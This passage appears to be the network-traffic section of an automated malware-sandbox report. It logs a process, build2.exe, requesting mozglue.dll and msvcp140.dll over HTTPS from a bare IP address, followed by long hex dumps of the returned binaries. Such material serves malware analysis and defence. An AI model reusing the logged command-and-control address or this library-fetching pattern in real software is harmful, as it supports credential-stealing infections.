2024-05-25 19:30:11 UTC	16384	IN	Data Raw: 89 4d bc 8b 4f 28 89 4d a8 89 75 c8 89 45 d8 8b 47 24 89 45 c0 8b 77 20 89 75 ac 8b 4f 08 89 4d e0 89 f8 89 7d ec 8b 5d a8 01 d9 8b 3f 01 f7 89 7d cc 8b 70 04 13 75 c0 89 75 b8 83 d1 00 89 4d d0 0f 92 45 b4 8b 70 0c 8b 55 bc 01 d6 8b 48 10 8b 45 d4 11 c1 0f 92 45 90 01 d6 11 c1 0f 92 45 e8 01 c6 89 45 d4 13 4d e4 0f 92 45 f0 01 5d e0 0f b6 7d b4 8d 04 06 11 c7 0f 92 45 b4 8b 45 c0 01 45 cc 11 5d b8 8b 45 bc 8b 55 d0 8d 1c 02 83 d3 00 89 5d e0 0f 92 c3 01 c2 0f b6 db 8b 45 e4 8d 14 07 11 d3 89 5d d0 0f 92 c2 03 75 d4 0f b6 45 b4 8b 5d e4 8d 34 19 11 f0 89 45 9c 0f 92 45 a4 01 df 0f b6 d2 8b 75 c8 8d 34 30 11 f2 0f 92 45 df 80 45 90 ff 8b 75 ec 8b 46 14 89 45 94 8d 04 03 89 df 83 d0 00 89 45 b4 0f 92 45 98 80 45 e8 ff 8d 1c 18 89 7d e4 83 d3 00 0f 92 45 8c Data Ascii: MO(MuEG$Ew uOM}]?}puuMEpUHEEEEME]}EEE]EU]E]uE]4EEu40EEuFEEEE}E
2024-05-25 19:30:11 UTC	16384	IN	Data Raw: ff ff 89 f8 81 e7 ff ff ff 01 8d 0c fe 89 d6 c1 ee 1d 01 f1 89 8d 04 ff ff ff c1 e8 19 8b bd 30 ff ff ff 89 fe 81 e7 ff ff ff 03 8d 3c f8 89 c8 c1 e8 1c 01 c7 c1 ee 1a 8b 9d 34 ff ff ff 89 d8 81 e3 ff ff ff 01 8d 1c de 89 fe c1 ee 1d 01 f3 c1 e8 19 8b b5 38 ff ff ff 89 f1 81 e6 ff ff ff 03 8d 04 f0 89 de c1 ee 1c 01 f0 89 c6 25 ff ff ff 1f 89 85 38 ff ff ff c1 e9 1a c1 ee 1d 8d 04 0e 01 f1 83 c1 ff 89 8d 14 ff ff ff 8b 8d 0c ff ff ff c1 e1 03 81 e1 f8 ff ff 1f 8d 0c 41 89 8d 18 ff ff ff 8b b5 10 ff ff ff 81 e6 ff ff ff 0f 89 c1 c1 e1 0b 29 ce 8b 8d 14 ff ff ff c1 e9 1f 89 8d 14 ff ff ff 83 c1 ff 89 ca 81 e2 00 00 00 10 01 d6 89 b5 24 ff ff ff 8b b5 08 ff ff ff 81 e6 ff ff ff 1f 89 ca 81 e2 ff ff ff 1f 01 d6 89 b5 28 ff ff ff 8b b5 04 ff ff ff 81 e6 ff ff Data Ascii: 0<48%8A)$(

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	49795	65.109.242.59	443	5316	C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-25 19:30:13 UTC	173	OUT	GET /mozglue.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 Host: 65.109.242.59 Cache-Control: no-cache
2024-05-25 19:30:13 UTC	246	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 25 May 2024 19:30:13 GMT Content-Type: application/octet-stream Content-Length: 608080 Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT Connection: close ETag: "6315a9f4-94750" Accept-Ranges: bytes
2024-05-25 19:30:13 UTC	16138	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W,
2024-05-25 19:30:13 UTC	16384	IN	Data Raw: ff ff 8d 41 24 50 e8 fb 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc e9 62 ff ff ff 8d 41 24 50 e8 df 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc eb 92 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 56 8b 75 0c 8b 8e b0 00 00 00 83 f9 10 0f 83 e4 00 00 00 c7 86 ac 00 00 00 00 00 00 00 c7 86 b0 00 00 00 0f 00 00 00 c6 86 9c 00 00 00 00 8b 8e 98 00 00 00 83 f9 10 0f 83 e0 00 00 00 c7 86 94 00 00 00 00 00 00 00 c7 86 98 00 00 00 0f 00 00 00 c6 86 84 00 00 00 00 8b 8e 80 00 00 00 83 f9 10 0f 83 dc 00 00 00 c7 46 7c 00 00 00 00 c7 86 80 00 00 00 0f 00 00 00 c6 46 6c 00 8b 4e 68 83 f9 10 0f 83 de 00 00 00 c7 46 64 00 00 00 00 c7 46 68 0f 00 00 00 c6 46 54 00 8b 4e 50 83 f9 10 0f 83 e3 00 00 00 c7 46 4c 00 00 00 00 c7 46 50 0f 00 00 00 c6 46 Data Ascii: A$P~#HbA$P~#HUVuF\|FlNhFdFhFTNPFLFPF
2024-05-25 19:30:13 UTC	16384	IN	Data Raw: 0f 86 bd 05 00 00 50 e8 7a d3 01 00 83 c4 04 e9 e1 f9 ff ff 8b 45 90 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 b4 05 00 00 50 e8 57 d3 01 00 83 c4 04 e9 dc f9 ff ff 8b 85 78 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 a8 05 00 00 50 e8 31 d3 01 00 83 c4 04 e9 d4 f9 ff ff 8b 85 60 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 9c 05 00 00 50 e8 0b d3 01 00 83 c4 04 e9 d2 f9 ff ff 8b 85 48 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 90 05 00 00 50 e8 e5 d2 01 00 83 c4 04 e9 d6 f9 ff ff 8b b5 24 ff ff ff 89 0e 8b 85 2c ff ff ff 89 46 04 8b 4d f0 31 e9 e8 52 27 03 00 89 f0 81 c4 d0 00 00 00 5e 5f 5b 5d c3 89 f1 89 fa ff b5 30 ff ff ff e9 30 f4 ff ff 89 f1 81 c6 4c ff ff ff 39 c8 74 63 8d 8d 3c ff ff ff 56 e8 de bc ff ff 89 f1 89 fa e8 d5 f1 Data Ascii: PzEPWxP1`PHP$,FM1R'^_[]00L9tc<V
2024-05-25 19:30:13 UTC	16384	IN	Data Raw: 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 03 b9 59 17 b7 d1 89 f8 f7 e1 89 d1 c1 e9 0d 89 c8 ba cd cc cc cc f7 e2 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 02 89 f8 c1 e8 05 b9 c5 5a 7c 0a f7 e1 89 d1 c1 e9 07 bb ff 00 00 00 89 c8 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c1 80 c9 30 ba 83 de 1b 43 89 f8 f7 e2 8b 06 8b 7d 08 88 4c 38 01 c1 ea 12 89 d0 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c2 80 ca 30 89 f1 8b 06 8b 75 08 88 14 06 8b 39 8d 47 07 89 01 83 c7 0d b9 cd cc cc cc 8b 75 ec 89 f0 f7 e1 89 d1 c1 e9 03 8d 04 09 8d 04 80 89 f3 29 c3 80 cb 30 89 c8 ba cd cc cc cc f7 e2 8b 45 08 88 1c 38 89 c3 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 7d 0c 8b 07 88 4c 18 05 b9 1f 85 eb 51 89 f0 f7 e1 89 d1 c1 e9 05 89 c8 ba Data Ascii: )0LY)0LZ\|!i(0C}L8!i(0u9Gu)0E8)0}LQ
2024-05-25 19:30:13 UTC	16384	IN	Data Raw: 00 00 00 31 c9 8d 14 08 83 c2 0c f2 0f 10 42 f4 8b 5d f0 f2 0f 11 04 0b 8b 7a fc c7 42 fc 00 00 00 00 89 7c 0b 08 8b 1e 8b 7e 04 8d 3c 7f 8d 3c bb 83 c1 0c 39 fa 72 cd e9 81 00 00 00 8b 06 8d 0c 49 8d 0c 88 89 4d f0 31 d2 8d 1c 10 83 c3 0c f2 0f 10 43 f4 f2 0f 11 04 17 8b 4b fc c7 43 fc 00 00 00 00 89 4c 17 08 83 c2 0c 3b 5d f0 72 da 8b 46 04 85 c0 0f 8e 02 ff ff ff 8b 1e 8d 04 40 8d 04 83 89 45 f0 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 ec 52 01 00 83 c4 04 83 c3 0c 3b 5d f0 0f 83 d4 fe ff ff eb db 31 c0 40 89 45 ec e9 27 ff ff ff 8d 0c 49 8d 3c 88 89 c3 39 fb 73 20 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 b0 52 01 00 83 c4 04 83 c3 0c 39 fb 72 e2 8b 1e 53 e8 9e 52 01 00 83 c4 04 8b 45 f0 89 06 8b 45 ec 89 46 08 e9 8b fe ff ff 68 a7 fa 07 Data Ascii: 1B]zB\|~<<9rIM1CKCL;]rF@ECCtPR;]1@E'I<9s CCtPR9rSREEFh
2024-05-25 19:30:13 UTC	16384	IN	Data Raw: 1b 89 c8 e9 b3 fe ff ff 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 07 89 c8 e9 c2 fe ff ff ff 15 b0 bf 08 10 cc cc cc cc 55 89 e5 57 56 89 ce 8b 79 20 85 ff 74 28 f0 ff 4f 38 75 22 8b 4f 14 83 f9 10 73 5f c7 47 10 00 00 00 00 c7 47 14 0f 00 00 00 c6 07 00 57 e8 2d 13 01 00 83 c4 04 8b 7e 18 c7 46 18 00 00 00 00 85 ff 74 1c 8b 07 85 c0 74 0d 50 ff 15 04 be 08 10 c7 07 00 00 00 00 57 e8 03 13 01 00 83 c4 04 8b 46 08 85 c0 75 2f 8b 46 04 85 c0 74 09 50 e8 ec 12 01 00 83 c4 04 5e 5f 5d c3 8b 07 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 76 20 50 e8 cf 12 01 00 83 c4 04 eb 86 c7 05 f4 f8 08 10 1a 2b 08 10 cc b9 18 00 00 00 e8 0d 80 02 00 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 04 89 c8 eb cf ff 15 b0 bf 08 10 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 e4 f8 Data Ascii: H) sUWVy t(O8u"Os_GGW-~FttPWFu/FtP^_]v P+H) sUSWV
2024-05-25 19:30:13 UTC	16384	IN	Data Raw: 00 00 c7 44 24 34 07 00 00 00 66 c7 44 24 20 00 00 57 e8 e1 37 06 00 83 c4 04 89 c6 83 f8 07 8b 5c 24 04 0f 87 4b 03 00 00 8d 44 24 20 89 70 10 89 f1 01 f1 51 57 50 e8 fe 37 06 00 83 c4 0c 66 c7 44 74 20 00 00 8b 44 24 30 8b 4c 24 34 89 ca 29 c2 83 fa 11 0f 82 fd 05 00 00 8d 50 11 89 54 24 30 83 f9 08 72 06 8b 4c 24 20 eb 04 8d 4c 24 20 0f b7 15 de 4d 08 10 66 89 54 41 20 0f 10 05 ce 4d 08 10 0f 11 44 41 10 0f 10 05 be 4d 08 10 0f 11 04 41 66 c7 44 41 22 00 00 bf 10 00 00 00 57 e8 60 3e 00 00 83 c4 04 89 c6 8b 45 0c f2 0f 10 40 20 f2 0f 11 06 f2 0f 10 40 28 f2 0f 11 46 08 83 7c 24 34 08 72 06 8b 44 24 20 eb 04 8d 44 24 20 57 56 6a 03 6a 00 50 53 ff 15 2c e3 08 10 89 c3 56 e8 9e d2 00 00 83 c4 04 8b 4c 24 34 83 f9 08 8b 7c 24 08 0f 83 b0 03 00 00 85 db 0f Data Ascii: D$4fD$ W7\$KD$ pQWP7fDt D$0L$4)PT$0rL$ L$ MfTA MDAMAfDA"W`>E@ @(F\|$4rD$ D$ WVjjPS,VL$4\|$
2024-05-25 19:30:14 UTC	16384	IN	Data Raw: 08 0f 86 cc 02 00 00 83 c3 0f 89 d8 83 e0 f0 89 44 24 1c c1 eb 04 c1 e3 05 8d 34 1f 83 c6 50 80 7f 3c 00 89 7c 24 10 89 5c 24 18 74 0a 83 7f 40 00 0f 84 29 06 00 00 8d 47 0c 89 44 24 20 50 ff 15 30 be 08 10 8b 16 85 d2 0f 84 38 01 00 00 83 7a 08 00 0f 84 2e 01 00 00 8b 4a 04 8b 74 8a 0c 85 f6 0f 84 eb 01 00 00 8b 5f 40 85 db 75 60 0f bc fe 89 cb c1 e3 05 09 fb 0f bb fe 8b 7c 24 10 8b 44 24 18 0f af 5c 07 58 8b 44 07 68 89 74 8a 0c 01 d0 01 c3 83 42 08 ff 85 db 0f 84 a2 05 00 00 8b 44 24 1c 01 47 2c ff 74 24 20 ff 15 b0 be 08 10 85 db 0f 84 93 05 00 00 8b 4c 24 60 31 e9 e8 51 e7 01 00 89 d8 8d 65 f4 5e 5f 5b 5d c3 89 4c 24 04 89 54 24 14 8b 0b 8b 7b 04 89 3c 24 0f a4 cf 17 89 c8 c1 e0 17 31 c8 8b 53 0c 33 3c 24 89 7c 24 08 8b 4b 08 89 0c 24 89 53 04 0f a4 Data Ascii: D$4P<\|$\$t@)GD$ P08z.Jt_@u`\|$D$\XDhtBD$G,t$ L$`1Qe^_[]L$T${<$1S3<$\|$K$S
2024-05-25 19:30:14 UTC	16384	IN	Data Raw: 58 e9 75 ff ff ff c7 44 24 3c 00 00 00 00 8b 5c 24 04 e9 a5 fe ff ff 31 d2 a8 10 0f 44 54 24 18 31 c9 39 f2 0f 97 c0 0f 82 e1 fe ff ff 88 c1 e9 d5 fe ff ff b0 01 e9 ec fd ff ff 8b 46 04 83 f8 01 0f 87 13 01 00 00 89 f2 8b 06 31 c9 85 c0 8b 74 24 1c 0f 84 39 04 00 00 8b 48 04 83 e1 fe 89 0a 89 d1 83 e1 fe 89 54 24 04 8b 50 04 83 e2 01 09 ca 89 50 04 8b 54 24 04 8b 52 04 83 e2 01 09 ca 89 50 04 8b 4c 24 04 80 49 04 01 83 60 04 01 89 c1 e9 fb 03 00 00 c7 44 24 28 00 00 00 00 e9 f9 fd ff ff 8d 74 24 54 89 f1 e8 37 0b fe ff 8b 1e e9 47 ff ff ff 83 e3 fe 89 58 04 89 d6 8b 1a 85 db 0f 84 fb 01 00 00 8b 43 04 83 e0 fe 89 06 89 f0 83 e0 fe 8b 4b 04 83 e1 01 09 c1 89 4b 04 8b 4e 04 89 c8 83 e0 fe 0f 84 c0 01 00 00 8b 10 83 e2 fe 83 e1 01 09 d1 89 4e 04 89 30 8b 4b Data Ascii: XuD$<\$1DT$19F1t$9HT$PPT$RPL$I`D$(t$T7GXCKKNN0K
2024-05-25 19:30:14 UTC	16384	IN	Data Raw: c1 72 d1 88 cb 8b 50 04 83 e2 fe eb cc 83 e3 fe 89 1a 89 d6 83 e6 fe 8b 18 8b 48 04 83 e1 01 09 f1 89 48 04 85 db 0f 84 8d 0a 00 00 80 63 04 fe 8b 74 24 14 39 16 75 07 89 06 e9 69 ff ff ff 83 e0 fe 8b 56 04 83 e2 01 8d 0c 02 89 4e 04 85 c0 0f 84 25 0a 00 00 8b 08 83 e1 fe 09 d1 89 4e 04 89 30 8b 4e 04 83 e1 01 8b 50 04 83 e2 fe 09 ca 89 50 04 80 4e 04 01 85 ff 0f 84 1f 0a 00 00 39 37 0f 84 a0 05 00 00 e9 e0 05 00 00 8b 4c 24 1c 8b 19 89 d9 ba 00 f0 ff ff 21 d1 8b 70 08 21 d6 31 d2 39 f1 0f 97 c2 b9 ff ff ff ff 0f 42 d1 85 d2 0f 85 59 05 00 00 e9 c0 05 00 00 89 c1 85 d2 0f 85 c2 fe ff ff 8b 54 24 04 c7 02 00 00 00 00 8b 4c 24 08 c7 44 b1 14 01 00 00 00 83 fb 01 0f 84 17 02 00 00 89 10 8b 54 24 20 8b 44 24 48 85 c0 0f 84 c2 09 00 00 80 60 04 fe 8b 4c 24 0c Data Ascii: rPHHct$9uiVN%N0NPPN97L$!p!19BYT$L$DT$ D$H`L$

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	49796	65.109.242.59	443	5316	C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-25 19:30:15 UTC	174	OUT	GET /msvcp140.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 Host: 65.109.242.59 Cache-Control: no-cache
2024-05-25 19:30:15 UTC	246	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 25 May 2024 19:30:15 GMT Content-Type: application/octet-stream Content-Length: 450024 Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT Connection: close ETag: "6315a9f4-6dde8" Accept-Ranges: bytes
2024-05-25 19:30:15 UTC	16138	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_
2024-05-25 19:30:15 UTC	16384	IN	Data Raw: 68 00 72 00 00 00 68 00 75 00 2d 00 68 00 75 00 00 00 68 00 79 00 2d 00 61 00 6d 00 00 00 69 00 64 00 2d 00 69 00 64 00 00 00 69 00 73 00 2d 00 69 00 73 00 00 00 69 00 74 00 2d 00 63 00 68 00 00 00 69 00 74 00 2d 00 69 00 74 00 00 00 6a 00 61 00 2d 00 6a 00 70 00 00 00 6b 00 61 00 2d 00 67 00 65 00 00 00 6b 00 6b 00 2d 00 6b 00 7a 00 00 00 6b 00 6e 00 2d 00 69 00 6e 00 00 00 6b 00 6f 00 2d 00 6b 00 72 00 00 00 6b 00 6f 00 6b 00 2d 00 69 00 6e 00 00 00 00 00 6b 00 79 00 2d 00 6b 00 67 00 00 00 6c 00 74 00 2d 00 6c 00 74 00 00 00 6c 00 76 00 2d 00 6c 00 76 00 00 00 6d 00 69 00 2d 00 6e 00 7a 00 00 00 6d 00 6b 00 2d 00 6d 00 6b 00 00 00 6d 00 6c 00 2d 00 69 00 6e 00 00 00 6d 00 6e 00 2d 00 6d 00 6e 00 00 00 6d 00 72 00 2d 00 69 00 6e 00 00 00 6d 00 73 00 2d Data Ascii: hrhu-huhy-amid-idis-isit-chit-itja-jpka-gekk-kzkn-inko-krkok-inky-kglt-ltlv-lvmi-nzmk-mkml-inmn-mnmr-inms-
2024-05-25 19:30:15 UTC	16384	IN	Data Raw: 00 10 e8 7b 00 10 04 7c 00 10 00 00 00 00 d8 4c 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 f4 8a 00 10 00 00 00 00 01 00 00 00 04 00 00 00 44 8b 00 10 58 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 14 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 34 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 84 8b 00 10 98 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 34 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 74 8b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 58 4d 06 10 c8 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 d8 8b 00 10 ec 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 58 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 c8 8b 00 10 00 Data Ascii: {\|L@DX}0}}M@4}0}}4M@tXM}0}}XM@
2024-05-25 19:30:15 UTC	16384	IN	Data Raw: c0 89 45 f4 de ea d9 c9 d9 5d e8 d9 45 e8 d9 55 10 d9 ee da e9 df e0 f6 c4 44 7b 05 dd d8 d9 45 10 8d 45 ec 50 8d 45 f8 50 d9 5d ec e8 fc fa ff ff 59 59 3b f3 0f 8c aa fd ff ff eb 10 8d 4e 01 d9 1c b7 3b cb 7d 06 d9 ee d9 5c b7 04 5e 8b c7 5f 5b c9 c3 55 8b ec 51 56 33 f6 39 75 14 7e 37 d9 ee 57 8b 7d 10 d9 04 b7 d9 5d fc d9 45 fc dd e1 df e0 dd d9 f6 c4 44 7b 1a 51 d9 1c 24 ff 75 0c ff 75 08 e8 97 fc ff ff d9 ee 83 c4 0c 46 3b 75 14 7c d2 dd d8 5f 8b 45 08 5e c9 c3 55 8b ec 51 51 8b 4d 0c 85 c9 75 04 d9 ee c9 c3 8b 55 08 83 f9 01 0f 84 9d 00 00 00 d9 02 d9 5d fc d9 45 fc d9 ee dd e1 df e0 f6 c4 44 0f 8b 82 00 00 00 d9 42 04 d9 5d fc d9 45 fc dd e1 df e0 f6 c4 44 7b 6e 83 f9 02 74 5d d9 42 08 d9 5d fc d9 45 fc dd e2 df e0 dd da f6 c4 44 7b 49 d9 c2 d8 c1 Data Ascii: E]EUD{EEPEP]YY;N;}\^_[UQV39u~7W}]ED{Q$uuF;u\|_E^UQQMuU]EDB]ED{nt]B]ED{I
2024-05-25 19:30:15 UTC	16384	IN	Data Raw: f7 0f b7 06 66 3b c1 74 0e 66 3b c2 74 09 8b 45 08 33 db 8b 30 eb 43 03 f7 6a 04 5b 89 75 f8 66 83 3e 28 89 5d f4 75 32 8b de 03 df 68 07 01 00 00 0f b7 03 50 ff 15 ac 72 06 10 59 59 85 c0 75 e9 0f b7 03 83 f8 5f 74 e1 89 5d f8 8b 5d f4 83 f8 29 75 06 8b 75 f8 83 c6 02 8b 45 0c 85 c0 74 02 89 30 8b 45 08 5f 89 30 8b c3 5e 5b c9 c3 55 8b ec 83 ec 48 a1 c0 41 06 10 33 c5 89 45 fc 6b 4d 18 07 33 d2 8b 45 10 53 8b 5d 14 56 8b 75 0c 89 75 d0 89 45 b8 89 55 bc 89 55 c4 89 55 c0 89 4d cc 57 8b fa 83 f9 23 7e 06 6a 23 59 89 4d cc 6a 30 58 89 13 89 53 04 66 39 06 75 12 c7 45 c4 01 00 00 00 83 c6 02 66 39 06 74 f8 89 75 d0 0f b7 0e b8 b8 2d 00 10 89 4d c8 8b 4d cc c7 45 d4 16 00 00 00 8b 75 c8 66 39 30 8b 75 d0 74 0b 83 c0 02 83 6d d4 01 75 ec 8b c2 85 c0 74 26 3b Data Ascii: f;tf;tE30Cj[uf>(]u2hPrYYu_t]])uuEt0E_0^[UHA3EkM3ES]VuuEUUUMW#~j#YMj0XSf9uEf9tu-MMEuf90utmut&;
2024-05-25 19:30:15 UTC	16384	IN	Data Raw: cc cc cc cc cc cc 55 8b ec 6a ff 68 09 e7 03 10 64 a1 00 00 00 00 50 a1 c0 41 06 10 33 c5 50 8d 45 f4 64 a3 00 00 00 00 e8 79 7b 00 00 50 e8 71 d8 ff ff 59 8b 40 0c 8b 4d f4 64 89 0d 00 00 00 00 59 c9 c3 cc cc 55 8b ec 83 79 38 00 8b 45 08 75 03 83 c8 04 ff 75 0c 50 e8 28 00 00 00 5d c2 08 00 cc cc cc cc 55 8b ec 6a 00 ff 75 08 e8 13 00 00 00 5d c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 45 08 83 ec 1c 83 e0 17 89 41 0c 8b 49 10 56 23 c8 74 43 80 7d 0c 00 75 42 f6 c1 04 74 07 be 78 54 00 10 eb 0f be 90 54 00 10 f6 c1 02 75 05 be a8 54 00 10 8d 45 f8 6a 01 50 e8 f7 13 00 00 59 59 50 56 8d 4d e4 e8 bc e2 ff ff 68 a4 1a 04 10 8d 45 e4 50 eb 09 5e c9 c2 08 00 6a 00 6a 00 e8 f0 93 02 00 cc 53 57 8b f9 83 7f 4c 00 75 04 33 db eb 24 56 e8 Data Ascii: UjhdPA3PEdy{PqY@MdYUy8EuuP(]Uju]UEAIV#tC}uBtxTTuTEjPYYPVMhEP^jjSWLu3$V
2024-05-25 19:30:15 UTC	16384	IN	Data Raw: 83 c4 10 c6 04 1e 00 83 f8 10 72 0b 40 50 ff 37 e8 54 95 ff ff 59 59 89 37 8b c7 5f 5e 5b c9 c2 0c 00 e8 b3 be ff ff cc 55 8b ec 83 ec 0c 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d fc 3b c2 72 69 8b 43 14 8d 3c 11 57 8b cb 89 45 f4 e8 88 b1 ff ff 8b f0 8d 4e 01 51 e8 b2 94 ff ff 59 ff 75 18 89 7b 10 8d 4d 0c ff 75 14 8b 7d f4 89 45 f8 89 73 14 ff 75 10 ff 75 fc 83 ff 10 72 17 8b 33 56 50 e8 6b 03 00 00 8d 47 01 50 56 e8 d2 94 ff ff 59 59 eb 07 53 50 e8 56 03 00 00 8b 45 f8 5f 89 03 8b c3 5e 5b c9 c2 14 00 e8 25 be ff ff cc 55 8b ec 83 ec 10 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d f0 3b c2 0f 82 8f 00 00 00 8b 43 14 8d 3c 11 57 8b cb 89 45 fc e8 f6 b0 ff ff 8b f0 8d 4e 01 51 e8 20 94 ff ff 83 7d fc 10 59 0f be 4d 14 89 Data Ascii: r@P7TYY7_^[UUSVWK+M;riC<WENQYu{Mu}Esuur3VPkGPVYYSPVE_^[%UUSVWK+M;C<WENQ }YM
2024-05-25 19:30:15 UTC	16384	IN	Data Raw: 4d d4 53 33 c0 03 04 cb 52 13 7c cb 04 56 57 50 e8 f1 02 02 00 5b 8b 5d 08 8b f9 8b 4d d4 8b 75 d8 89 54 cb 04 8b 55 e8 89 04 cb 83 e9 01 89 4d d4 79 cf 5f 5e 5b c9 c3 55 8b ec 51 56 8b 75 14 33 d2 85 f6 7e 5f 53 8b 5d 08 29 5d 10 57 8b fb 89 75 fc 8b 5d 10 8b 0c 3b 03 0f 8b 44 3b 04 13 47 04 03 ca 89 0f 8d 7f 08 83 d0 00 8b d0 89 57 fc 83 67 fc 00 83 ee 01 75 dc 0b c6 8b 5d 08 74 22 8b 4d fc 3b 4d 0c 7d 1a 01 14 cb 8b 54 cb 04 13 d6 33 f6 89 54 cb 04 8b c2 21 74 cb 04 41 0b c6 75 e1 5f 5b 5e c9 c3 55 8b ec 8b 55 08 56 8b 75 0c 83 c2 f8 8d 14 f2 8b 02 0b 42 04 75 0b 8d 52 f8 4e 8b 0a 0b 4a 04 74 f5 8b c6 5e 5d c3 55 8b ec 53 56 33 db 33 f6 39 5d 0c 7e 30 57 8b 7d 08 ff 75 14 ff 75 10 ff 74 f7 04 ff 34 f7 e8 73 03 02 00 03 c3 89 04 f7 83 d2 00 8b da 89 5c Data Ascii: MS3R\|VWP[]MuTUMy_^[UQVu3~_S])]Wu];D;GWgu]t"M;M}T3T!tAu_[^UUVuBuRNJt^]USV339]~0W}uut4s\
